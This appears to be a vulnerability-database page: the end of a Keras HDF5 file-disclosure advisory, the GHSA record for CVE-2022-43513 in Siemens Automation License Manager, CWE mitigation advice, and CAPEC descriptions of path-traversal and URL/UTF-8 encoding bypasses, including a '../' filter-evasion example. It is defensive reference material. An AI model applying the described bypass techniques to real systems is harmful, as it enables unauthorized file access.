"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}
GHSA-3MF9-JJRH-XQV8
Vulnerability from github – Published: 2023-01-10 12:30 – Updated: 2024-04-09 09:31A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions < V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.
{
"affected": [],
"aliases": [
"CVE-2022-43513"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-10T12:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions \u003c V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.",
"id": "GHSA-3mf9-jjrh-xqv8",
"modified": "2024-04-09T09:31:07Z",
"published": "2023-01-10T12:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43513"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-476715.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-556635.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-476715.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).
Mitigation
Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.
Mitigation
If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
Mitigation
Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.
CAPEC-13: Subverting Environment Variable Values
The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.
CAPEC-267: Leverage Alternate Encoding
An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.
CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic
This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
CAPEC-72: URL Encoding
This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
CAPEC-78: Using Escaped Slashes in Alternate Encoding
This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.
CAPEC-79: Using Slashes in Alternate Encoding
This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.
CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic
This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.